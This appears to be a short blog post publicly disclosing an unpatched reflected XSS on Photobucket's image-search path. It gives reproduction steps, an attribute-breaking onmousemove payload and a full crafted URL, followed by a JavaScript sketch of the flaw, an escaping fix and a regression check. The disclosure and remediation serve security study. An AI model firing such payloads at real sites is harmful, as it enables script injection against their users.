Today I want to publish a reflected XSS which I found in February on Photobucket. While I was cleaning my email inbox I noticed I have had this report since February and they have not answered me, so here it is!
Affected domain: http://photobucket.com
Steps to reproduce the vulnerability:
1. Go to http://photobucket.com/images/anything-you-want
2. Add this to it ---> " onmousemove="alert(0)">
Now your URL could be something like this: http://photobucket.com/images/android" onmousemove="alert(0)">?page=1
You have the XSS!
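
The payload in step 2 only works if the path segment is echoed inside a double-quoted HTML attribute without escaping the quote character. A minimal sketch of that bug beside its fix, as an added example that is not Photobucket's code or part of the original report; the `<input>` template and all function names are assumptions.

```javascript
// Added example. The <input> template and every function name are assumptions;
// the page does not show the markup the path is reflected into.

// Pull the term out of /images/<term>, decoding percent-escapes as a server would.
function termFromPath(path) {
  const m = /^\/images\/([^?#]*)/.exec(path);
  if (!m) return "";
  try { return decodeURIComponent(m[1]); } catch { return m[1]; }
}

// Escape the characters that can end a quoted attribute value or open a tag.
function escapeHtmlAttr(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// 'Before': the term is placed in a double-quoted attribute unchanged.
function renderVulnerable(path) {
  return `<input type="text" name="q" value="${termFromPath(path)}">`;
}

// 'After': same template, term escaped for the attribute context.
function renderHardened(path) {
  return `<input type="text" name="q" value="${escapeHtmlAttr(termFromPath(path))}">`;
}

// Names of the double-quoted attributes a parser would see in the markup.
function attributeNames(html) {
  return [...html.matchAll(/([a-zA-Z-]+)\s*=\s*"[^"]*"/g)].map((m) => m[1].toLowerCase());
}

// Regression check: user input must never add an on* event-handler attribute.
function addsEventHandler(html) {
  return attributeNames(html).some((name) => name.startsWith("on"));
}

// Path taken from the post's step 2, plus the percent-encoded form a browser sends.
const rawPath = '/images/android" onmousemove="alert(0)">?page=1';
const encodedPath = "/images/android%22%20onmousemove=%22alert(0)%22%3E?page=1";

for (const p of [rawPath, encodedPath]) {
  console.log(addsEventHandler(renderVulnerable(p)), addsEventHandler(renderHardened(p)));
}
```

The `addsEventHandler` check can be kept as a regression test on any template that reflects request data into an attribute.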